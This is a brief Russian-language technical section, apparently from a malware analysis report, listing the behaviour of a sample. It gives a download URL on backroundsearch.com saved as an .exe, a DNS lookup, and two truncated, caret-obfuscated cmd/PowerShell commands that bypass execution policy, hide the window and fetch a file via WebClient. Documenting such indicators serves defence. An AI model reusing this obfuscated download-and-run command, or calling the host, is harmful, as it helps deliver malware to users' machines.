Техническая информация
- http://backroundsearch.com/ginerotyba/tehitynoles.png как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^WE^r^sHel^L^.E^xE ^-exEC^Ut^I^ONP^OL^iC^y ^b^Y^P^Ass -NO^PROf^i^le^ -wiNDo^wStYLe^ HI^Dd^EN^ ^(NE^W-o^bjecT sys^Tem^.^N^et.^W^ebclie^NT).doWNL^OAdf^iL^E^(^'http://backrounds...
- DNS ASK ba####undsearch.com
- '<SYSTEM32>\cmd.exe' /C "po^WE^r^sHel^L^.E^xE ^-exEC^Ut^I^ONP^OL^iC^y ^b^Y^P^Ass -NO^PROf^i^le^ -wiNDo^wStYLe^ HI^Dd^EN^ ^(NE^W-o^bjecT sys^Tem^.^N^et.^W^ebclie^NT).doWNL^OAdf^iL^E^(^'http://backrounds...' (со скрытым окном)